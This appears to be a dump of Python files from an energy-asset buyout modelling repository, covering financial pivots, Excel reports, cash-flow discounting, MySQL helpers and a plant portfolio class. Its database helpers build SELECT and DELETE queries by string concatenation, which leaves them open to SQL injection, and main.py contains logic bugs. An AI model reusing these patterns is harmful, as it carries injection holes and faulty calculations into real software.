sum_fslis_lbo_financials_df.loc[:,'year'] = pd.DatetimeIndex(sum_fslis_lbo_financials_df['period']).year
grouped_sum_fslis_lbo_financials_df = sum_fslis_lbo_financials_df.groupby(['portfolio','scenario','version','entity','fsli','year']).sum()
grouped_sum_fslis_lbo_financials_df = grouped_sum_fslis_lbo_financials_df.reset_index()
average_fslis = ['ICAP']
average_fslis_lbo_financials_df = lbo_financials_df.loc[lbo_financials_df.fsli.isin(average_fslis)]
average_fslis_lbo_financials_df.loc[:,'year'] = pd.DatetimeIndex(average_fslis_lbo_financials_df['period']).year
grouped_average_fslis_lbo_financials_df = average_fslis_lbo_financials_df.groupby(['portfolio','scenario','version','entity','fsli','year']).mean()
grouped_average_fslis_lbo_financials_df = grouped_average_fslis_lbo_financials_df.reset_index()
annual_lbo_financials_df = grouped_sum_fslis_lbo_financials_df.append(grouped_average_fslis_lbo_financials_df)
""" pivot it to per year per column """
pivot_annual_lbo_financials_df = pd.pivot_table(annual_lbo_financials_df, index=['portfolio','scenario','version','entity','year'], columns=['fsli'], values='value', aggfunc=np.sum)
pivot_annual_lbo_financials_df = pivot_annual_lbo_financials_df.reset_index()
pivot_annual_lbo_financials_df['Capacity Factor'] = pivot_annual_lbo_financials_df['Generation'] / ( pivot_annual_lbo_financials_df['ICAP'] * ( pivot_annual_lbo_financials_df['Hours - On Peak'] + pivot_annual_lbo_financials_df['Hours - Off Peak'] ))
pivot_annual_lbo_financials_df['Capacity Factor - On Peak'] = pivot_annual_lbo_financials_df['Generation - On Peak'] / ( pivot_annual_lbo_financials_df['ICAP'] * ( pivot_annual_lbo_financials_df['Hours - On Peak'] ))
pivot_annual_lbo_financials_df['Capacity Factor - Off Peak'] = pivot_annual_lbo_financials_df['Generation - Off Peak'] / ( pivot_annual_lbo_financials_df['ICAP'] * ( pivot_annual_lbo_financials_df['Hours - Off Peak'] ))
annual_lbo_financials_df = pd.melt(pivot_annual_lbo_financials_df,
id_vars=['portfolio','scenario','version','entity','year'],
value_vars=[item for item in list(pivot_annual_lbo_financials_df.columns) if item not in ['portfolio','scenario','version','entity','year']],
var_name='fsli',
value_name='value')
grouped_sum_fslis_lbo_financials_df = annual_lbo_financials_df
annual_lbo_financials_view_df = pd.DataFrame()
for entity in entity_list:
entity_annual_financials_df = grouped_sum_fslis_lbo_financials_df.loc[grouped_sum_fslis_lbo_financials_df.entity == entity]
pivot_annual_lbo_financials_df = pd.pivot_table(entity_annual_financials_df, index=['portfolio','scenario','version','entity','fsli'], columns=['year'], values='value', aggfunc=np.sum)
pivot_annual_lbo_financials_df = pivot_annual_lbo_financials_df.reset_index()
pivot_annual_lbo_financials_df = pivot_annual_lbo_financials_df[[item for item in pivot_annual_lbo_financials_df.columns if item not in ['portfolio','scenario','version','entity']]]
pivot_annual_lbo_financials_df = pivot_annual_lbo_financials_df.set_index('fsli')
pivot_annual_lbo_financials_df = pivot_annual_lbo_financials_df.reindex(LBO_SUM_FSLIS + ['ICAP','Capacity Factor','Capacity Factor - On Peak','Capacity Factor - Off Peak'])
pivot_annual_lbo_financials_df = pivot_annual_lbo_financials_df.reset_index()
pivot_annual_lbo_financials_df['entity'] = entity
pivot_annual_lbo_financials_df = pivot_annual_lbo_financials_df[['entity'] + [item for item in pivot_annual_lbo_financials_df.columns if item not in ['entity']]]
annual_lbo_financials_view_df = annual_lbo_financials_view_df.append(pivot_annual_lbo_financials_df)
return annual_lbo_financials_df[['portfolio','scenario','version','entity','fsli','year','value']], annual_lbo_financials_view_df
def write_lbo_financials_diff_report(dest_file_path, portfolio, first_lbo_financials_df, second_lbo_financials_df):
wb = Workbook()
first_annual_lbo_financials_df, first_annual_lbo_financials_view_df = convert_annual_lbo_financials(first_lbo_financials_df)
second_annual_lbo_financials_df, second_annual_lbo_financials_view_df = convert_annual_lbo_financials(second_lbo_financials_df)
merged_annual_lbo_financials_df = pd.merge(first_annual_lbo_financials_df, second_annual_lbo_financials_df, on=['portfolio','entity','fsli','year'], how='inner')
merged_annual_lbo_financials_df = merged_annual_lbo_financials_df.reset_index()
merged_annual_lbo_financials_df = merged_annual_lbo_financials_df[['portfolio','entity','fsli','year','value_x','value_y']]
merged_annual_lbo_financials_df.rename(columns={'value_x':'first_financials_value','value_y':'second_financials_value'}, inplace=True)
merged_annual_lbo_financials_df['diff_first_minus_second'] = merged_annual_lbo_financials_df['first_financials_value'] - merged_annual_lbo_financials_df['second_financials_value']
first_scenario_version = first_lbo_financials_df.iloc[0]['scenario'] + "-" + first_lbo_financials_df.iloc[0]['version']
second_scenario_version = second_lbo_financials_df.iloc[0]['scenario'] + "-" + second_lbo_financials_df.iloc[0]['version']
first_scenario_tab = wb.copy_worksheet(wb.active)
for r in dataframe_to_rows(first_annual_lbo_financials_view_df, index=False, header=True):
first_scenario_tab.append(r)
first_scenario_tab.title = 'FirstScenarioAnnual'
second_scenario_tab = wb.copy_worksheet(wb.active)
for r in dataframe_to_rows(second_annual_lbo_financials_view_df, index=False, header=True):
second_scenario_tab.append(r)
second_scenario_tab.title = 'SecondScenarioAnnual'
"""
entity_annual_financials_df, index=['portfolio','scenario','version','entity','fsli'], columns=['year'], values='value', aggfunc=np.sum
"""
merged_annual_lbo_financials_df = merged_annual_lbo_financials_df[['portfolio', 'entity', 'fsli', 'year', 'diff_first_minus_second']]
pivot_diff_lbo_financials_df = pd.pivot_table(merged_annual_lbo_financials_df, index=['portfolio','entity','fsli'], columns=['year'], values='diff_first_minus_second', aggfunc=np.sum)
pivot_diff_lbo_financials_df = pivot_diff_lbo_financials_df.reset_index()
pivot_diff_lbo_financials_df = pivot_diff_lbo_financials_df[[item for item in pivot_diff_lbo_financials_df.columns if item != 'portfolio']]
diff_result_df = pd.DataFrame()
entity_list = list(sorted(list(set(list(merged_annual_lbo_financials_df['entity'])))))
for entity in entity_list:
entity_annual_financials_df = pivot_diff_lbo_financials_df.loc[pivot_diff_lbo_financials_df.entity == entity]
entity_annual_financials_df = entity_annual_financials_df.set_index('fsli')
entity_annual_financials_df = entity_annual_financials_df.reindex(LBO_SUM_FSLIS + ['ICAP','Capacity Factor','Capacity Factor - On Peak','Capacity Factor - Off Peak'])
entity_annual_financials_df = entity_annual_financials_df.reset_index()
diff_result_df = diff_result_df.append(entity_annual_financials_df)
diff_result_df = diff_result_df[['entity','fsli'] + [item for item in diff_result_df.columns if item not in ['entity','fsli']]]
diff_scenario_tab = wb.copy_worksheet(wb.active)
for r in dataframe_to_rows(diff_result_df, index=False, header=True):
diff_scenario_tab.append(r)
diff_scenario_tab.title = 'DiffAnnual'
wb.remove_sheet(wb.active)
wb.save(dest_file_path + r"\diff_lbo_financials_" + first_scenario_version + " vs " + second_scenario_version + ".xlsx")
def write_lbo_graph_report(template_path, lbo_financials_df):
scenario = lbo_financials_df.iloc[0]['scenario']
version = lbo_financials_df.iloc[0]['version']
saved_file_path = r"C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\requirement_docs\vector_report\LBO Graphs " + scenario + version + ".xlsx"
wb = opx.load_workbook(template_path)
input_tab = wb['KEAN LBO Financials']
annual_financials_df, annual_lbo_financials_view_df = convert_annual_lbo_financials(lbo_financials_df)
for r in dataframe_to_rows(annual_lbo_financials_view_df, index=False, header=True):
input_tab.append(r)
wb.save(saved_file_path)
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,739 | changliukean/KEAN3 | refs/heads/master | /financial/FreeCashFlow.py | from dateutil.relativedelta import relativedelta
from financial import FSLI
class FreeCashFlow(FSLI):
def __init__(self, date_start, date_end, amount, time_zero, discount_rate=0, discounted_amount=0, discount_factor=0):
FSLI.__init__(self, 'Free Cash Flow', date_start, date_end, amount, credit_sign=1, is_subtotal=True)
self.discountRate = discount_rate
self.timeZero = time_zero
self.discountedAmount = discounted_amount
self.discountFactor = discount_factor
def calculate_discount_factor(self):
difference_in_years = relativedelta(self.end_date, self.time_zero).years
self.discountFactor = 1 / ((1 + self.discountRate) ** difference_in_years)
return self.discountFactor
def calculate_discounted_cashflow(self):
difference_in_years = relativedelta(self.end_date, self.time_zero).years
self.discountedAmount = self.amount * (1 / ((1 + self.discountRate) ** difference_in_years))
return self.discountedAmount
@staticmethod
def calculate_wacc(equity_cost_of_capital, debt_cost_of_capital, equity_percentage):
return equity_percentage * equity_cost_of_capital + (1 - equity_percentage) * debt_cost_of_capital
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,740 | changliukean/KEAN3 | refs/heads/master | /main.py | from scenario_control.Scenario import Scenario, ScenarioMaster
from datetime import datetime, date
from financial.FSLI import FSLI
if __name__ == '__main__':
name = 'Gross Energy Margin'
year_start = 2020
year_end = 2025
gem_value_list = [45636322, 41712668, 46086042, 47736731, 50610844, 54406182]
otherrev_value_list = [10000000, 10000000, 10000000, 10000000, 10000000, 10000000]
fixedcosts_value_list = [15000000, 15000000, 15000000, 15000000, 15000000, 15000000]
capex_value_list = [1500000, 1500000, 1500000, 1500000, 1500000, 1500000]
gem_fsli_list = []
otherrev_fsli_list = []
net_margin_fsli_list = []
fixedcost_fsli_list = []
ebitda_fsli_list = []
total_capex_fsli_list = []
for year in range(year_start, year_end):
year_start_date = date(year_start, 1, 1)
year_end_date = date(year_start, 12, 31)
index = list(range(year_start, year_end)).index(year)
gem_fsli = FSLI("Gross Energy Margin", year_start_date, year_end_date, gem_value_list[index], credit_sign=1)
otherrev_fsli = FSLI("Total Other Revenue", year_start_date, year_end_date, otherrev_value_list[index], credit_sign=1, is_subtotal=True)
net_margin_fsli = FSLI("Net Margin", year_start_date, year_end_date, credit_sign=1, is_subtotal=True)
net_margin_fsli.calc_subtotal([gem_fsli, otherrev_fsli])
gem_fsli_list.append(gem_fsli)
otherrev_fsli_list.append(otherrev_fsli)
net_margin_fsli_list.append(net_margin_fsli)
fixedcost_fsli = FSLI("Total Fixed Costs", year_start_date, year_end_date, fixedcosts_value_list[index], credit_sign=-1, is_subtotal=True)
fixedcosts_value_list.append(fixedcost_fsli)
capex_fsli = FSLI("Total Capex", year_start_date, year_end_date, capex_value_list[index], credit_sign=-1, is_subtotal=True)
ebitda_fsli = FSLI("EBITDA", year_start_date, year_end_date, credit_sign=1, is_subtotal=True)
ebitda_fsli.calc_subtotal([net_margin_fsli, fixedcost_fsli])
ebitda_fsli_list.append(ebitda_fsli)
for obj in ebitda_fsli_list:
print(obj)
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,741 | changliukean/KEAN3 | refs/heads/master | /database/dbScenarioMaster.py | from database.dbGeneral import HOST, USER, PASSWORD, DATABASE, config_connection
import pandas as pd
from sqlalchemy import create_engine
def get_scenario_master(output_portfolio, output_scenario_name, output_version, output_module, output_table):
connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
sql_statment = """
SELECT * FROM scenario_master
where
portfolio = '""" + output_portfolio + """'
and
output_module = '""" + output_module + """'
and
output_scenario = '""" + output_scenario_name + """'
and
output_table = '""" + output_table + """'
and
output_version = '""" + output_version + """'
;
"""
raw_scenario_master_df = pd.read_sql(sql_statment, connection_instance, params=[])
connection_instance.close()
return raw_scenario_master_df
def get_scenario_master_datetime(portfolio, scenario, version, module):
connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
sql_statment = """
SELECT * FROM scenario_datetime
where
portfolio = '""" + portfolio + """'
and
module = '""" + module + """'
and
scenario = '""" + scenario + """'
and
version = '""" + version + """'
;
"""
# print (sql_statment)
raw_scenario_master_datetime_df = pd.read_sql(sql_statment, connection_instance, params=[])
connection_instance.close()
return raw_scenario_master_datetime_df
def delete_scenario_master(output_portfolio, output_scenario_name, output_version, output_module, output_table):
connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
delete_sql_statment = """
DELETE FROM scenario_master
where
portfolio = '""" + output_portfolio + """'
and
output_module = '""" + output_module + """'
and
output_scenario = '""" + output_scenario_name + """'
and
output_table = '""" + output_table + """'
and
output_version = '""" + output_version + """'
;
"""
cursor = connection_instance.cursor()
cursor.execute(delete_sql_statment)
connection_instance.commit()
connection_instance.close()
def delete_scenario_datetime(portfolio, scenario, version, module):
connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
delete_sql_statment = """
DELETE FROM scenario_datetime
where
portfolio = '""" + portfolio + """'
and
module = '""" + module + """'
and
scenario = '""" + scenario + """'
and
version = '""" + version + """'
;
"""
print (delete_sql_statment)
cursor = connection_instance.cursor()
cursor.execute(delete_sql_statment)
connection_instance.commit()
connection_instance.close()
def insert_scenario_datetime(module, portfolio, scenario, version, start_year, number_of_years, forecast_start_month, valuation_date):
scenario_datetime_row_df = pd.DataFrame(data=[[module, portfolio, scenario, version, start_year, number_of_years, forecast_start_month, valuation_date]], columns=['module','portfolio','scenario','version','start_year','number_of_years','forecast_start_month','valuation_date'])
engine_str = 'mysql+mysqlconnector://' + USER + ':' + PASSWORD + '@' + HOST + '/' + DATABASE
engine = create_engine(engine_str, encoding='latin1', echo=True)
scenario_datetime_row_df.to_sql(name='scenario_datetime', con=engine, if_exists='append', index=False)
def insert_scenario_master(ready_to_kean_sm_df):
engine_str = 'mysql+mysqlconnector://' + USER + ':' + PASSWORD + '@' + HOST + '/' + DATABASE
engine = create_engine(engine_str, encoding='latin1', echo=True)
ready_to_kean_sm_df.to_sql(name='scenario_master', con=engine, if_exists='append', index=False)
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,742 | changliukean/KEAN3 | refs/heads/master | /database/dbPrices.py | from datetime import datetime, date, timedelta
from calendar import monthrange
from database.dbGeneral import HOST, USER, PASSWORD, DATABASE, PROD_DATABASE, config_connection
import pandas as pd
from sqlalchemy import create_engine
def get_historical_lmp(node_id, start_date, end_date, dart, database=PROD_DATABASE):
connection_instance = config_connection(HOST, USER, PASSWORD, database)
sql_statment = """
SELECT * FROM lmp_new
where
node_id = %s
and
delivery_date >= %s
and
delivery_date <= %s
and
dart = %s
;
"""
raw_lmp_df = pd.read_sql(sql_statment, connection_instance, params=[node_id, start_date, end_date, dart])
connection_instance.close()
return raw_lmp_df
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,743 | changliukean/KEAN3 | refs/heads/master | /model/Portfolio.py | import pandas as pd
from database import dbLBO, dbDispatch, dbPCUC
from utility import dispatchUtils, dateUtils
from model.Entity import Powerplant
from datetime import date
import sys
from pyexcelerate import Workbook
import numpy as np
class Portfolio:
def __init__(self, name, entities=[]):
self.name = name
self.entities = entities
""" Powerplants related operations """
def bulk_prepare_basis(self, start_date, end_date, dart='Day Ahead', market='All', to_database_option=False, to_excel=None):
powerplant_list = [entity for entity in self.entities if entity.type == 'plant']
if market != 'All':
powerplant_list = [ powerplant for powerplant in powerplant_list if powerplant.market == market]
basis_df = pd.DataFrame()
basis_hourly_detail_df = pd.DataFrame()
for powerplant in powerplant_list:
powerplant_basis_df, powerplant_basis_details_df = powerplant.build_basis(start_date, end_date, dart)
basis_df = basis_df.append(powerplant_basis_df)
basis_hourly_detail_df = basis_hourly_detail_df.append(powerplant_basis_details_df)
#
# basis_df.to_csv("basis_df.csv")
basis_df = basis_df.reset_index()
# print (basis_df.columns)
# basis_df = pd.read_csv("basis_df.csv")
portfolio_basis_result_df = pd.melt(basis_df, id_vars=['month','peak_info','plant'],
value_vars=['basis_$','basis_%'],
var_name='instrument',
value_name='value')
portfolio_basis_result_df['instrument_id'] = portfolio_basis_result_df.apply(lambda row: row['plant'] + ' basis - ' + row['peak_info'] + "_" + row['instrument'].split("_")[1], axis=1)
portfolio_basis_result_df = portfolio_basis_result_df.reset_index()
portfolio_basis_result_df = pd.pivot_table(portfolio_basis_result_df, index=['month'], columns=['instrument_id'], values='value', aggfunc=np.sum)
portfolio_basis_result_df = portfolio_basis_result_df.reset_index()
# portfolio_basis_result_df.to_csv("portfolio_basis_result_df.csv")
if to_excel is not None:
# basis_df.to_excel(to_excel, sheet_name='basis')
# basis_df.to_excel(to_excel, sheet_name='detail')
basis_values = [portfolio_basis_result_df.columns] + list(portfolio_basis_result_df.values)
wb = Workbook()
wb.new_sheet('basis', data=basis_values)
wb.save(to_excel)
wb = Workbook()
basis_detail_values = [basis_hourly_detail_df.columns] + list(basis_hourly_detail_df.values)
wb.new_sheet('basis_details', data=basis_detail_values)
wb.save(to_excel.split('.')[0] + "_hourly_detail.xlsx")
return basis_df, basis_hourly_detail_df
def get_powerplant_fromdb(self, initiate_technology=False):
portfolio_with_powerplant_df = dbLBO.get_portfolio_with_powerplant(self.name)
for index, row in portfolio_with_powerplant_df.iterrows():
powerplant = Powerplant(row.powerplant_name,
row.fuel_type,
row.market,
row.node,
row.power_hub,
row.technology_name,
row.power_zone,
row.power_hub_on_peak,
row.power_hub_off_peak,
row.fuel_zone,
row.fuel_hub,
row.summer_fuel_basis,
row.winter_fuel_basis,
row.summer_duct_capacity,
row.summer_base_capacity,
row.winter_duct_capacity,
row.winter_base_capacity,
row.first_plan_outage_start,
row.first_plan_outage_end,
row.second_plan_outage_start,
row.second_plan_outage_end,
row.carbon_cost,
row.source_notes,
row.retirement_date,
row.ownership)
self.entities.append(powerplant)
return self.entities
def update_portfolio_fromexcel(self, plant_tech_master_file):
# to be implemented
pass
def update_powerplants_fromexcel(self, plant_tech_master_file, additional=True):
ready_to_kean_pp_df, ready_to_kean_tech_df = dispatchUtils.load_pp_tech_info(plant_tech_master_file)
if not additional:
dbLBO.put_powerplants(ready_to_kean_pp_df, self.name, overwrite_option=True)
else:
dbLBO.put_powerplants(ready_to_kean_pp_df)
def bulk_convert_uc_dataframe(self, technology_df, scenario, version, start_date, end_date, escalation=0.02, push_to_kean=False):
powerplant_info_list = []
for entity in self.entities:
if isinstance(entity, Powerplant):
powerplant_info_list.append([entity.name,
entity.technology,
entity.fuelType,
entity.market,
entity.powerHub,
entity.powerZone,
entity.powerHubOnPeak,
entity.powerHubOffPeak,
entity.node,
entity.fuelZone,
entity.fuelHub,
entity.summerFuelBasis,
entity.winterFuelBasis,
entity.summerDuctCapacity,
entity.summerBaseCapacity,
entity.winterDuctCapacity,
entity.winterBaseCapacity,
entity.firstPlanOutageStart,
entity.firstPlanOutageEnd,
entity.secondPlanOutageStart,
entity.secondPlanOutageEnd,
entity.carbonCost,
entity.sourceNotes,
entity.retirementDate,
entity.ownership])
powerplant_df = pd.DataFrame(data=powerplant_info_list, columns=['name',
'technology',
'fuel_type',
'market',
'power_hub',
'power_zone',
'power_hub_on_peak',
'power_hub_off_peak',
'node',
'fuel_zone',
'fuel_hub',
'summer_fuel_basis',
'winter_fuel_basis',
'summer_duct_capacity',
'summer_base_capacity',
'winter_duct_capacity',
'winter_base_capacity',
'first_plan_outage_start',
'first_plan_outage_end',
'second_plan_outage_start',
'second_plan_outage_end',
'carbon_cost',
'source_notes',
'retirement_date',
'ownership'])
month_list = dateUtils.get_month_list(start_date, end_date)
merged_simple_uc_df = pd.merge(powerplant_df, technology_df, left_on='technology', right_on='name', how="left")
ready_to_kean_pcuc_df = pd.DataFrame()
for index, row in merged_simple_uc_df.iterrows():
plant_name = row['name_x']
total_plant_temp_df = pd.DataFrame()
temp_ready_to_kean_df = pd.DataFrame(data=month_list, columns=['period'])
""" emissions """
emissions = row['carbon_cost'] * row['emissions_rate'] / 2000.0
if row['market'] == 'CAISO':
emissions = row['carbon_cost'] * row['emissions_rate'] / 2205.0
emissions_temp_ready_to_kean_df = temp_ready_to_kean_df
emissions_temp_ready_to_kean_df['characteristic'] = 'emissions'
emissions_temp_ready_to_kean_df['value'] = emissions_temp_ready_to_kean_df.apply(lambda row: dispatchUtils.get_escalated_value(emissions, escalation, row['period']), axis=1)
emissions_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(emissions_temp_ready_to_kean_df)
""" forced_outage_value """
forced_outage_value = row['uof']
fov_temp_ready_to_kean_df = temp_ready_to_kean_df
fov_temp_ready_to_kean_df['characteristic'] = 'forced_outage_value'
fov_temp_ready_to_kean_df['value'] = forced_outage_value
fov_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(fov_temp_ready_to_kean_df)
""" fuel_transport """
fuel_transport_summer = row['summer_fuel_basis']
fuel_transport_winter = row['winter_fuel_basis']
ftp_temp_ready_to_kean_df = temp_ready_to_kean_df
ftp_temp_ready_to_kean_df['characteristic'] = 'fuel_transport'
ftp_temp_ready_to_kean_df['value'] = ftp_temp_ready_to_kean_df.apply(lambda row: dispatchUtils.get_load(row, fuel_transport_summer, fuel_transport_winter), axis=1)
ftp_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(ftp_temp_ready_to_kean_df)
""" fuel_type """
fuel_type = row['fuel_type']
ft_temp_ready_to_kean_df = temp_ready_to_kean_df
ft_temp_ready_to_kean_df['characteristic'] = 'fuel_type'
ft_temp_ready_to_kean_df['value'] = 0.0
ft_temp_ready_to_kean_df['value_str'] = fuel_type
total_plant_temp_df = total_plant_temp_df.append(ft_temp_ready_to_kean_df)
""" gas_instrument_id """
gas_instrument_id = row['fuel_hub']
gii_temp_ready_to_kean_df = temp_ready_to_kean_df
gii_temp_ready_to_kean_df['characteristic'] = 'gas_instrument_id'
gii_temp_ready_to_kean_df['value'] = 0.0
gii_temp_ready_to_kean_df['value_str'] = gas_instrument_id
total_plant_temp_df = total_plant_temp_df.append(gii_temp_ready_to_kean_df)
""" heatrate_high_load """
heatrate_high_load_summer = row['summer_base_heatrate']
heatrate_high_load_winter = row['winter_base_heatrate']
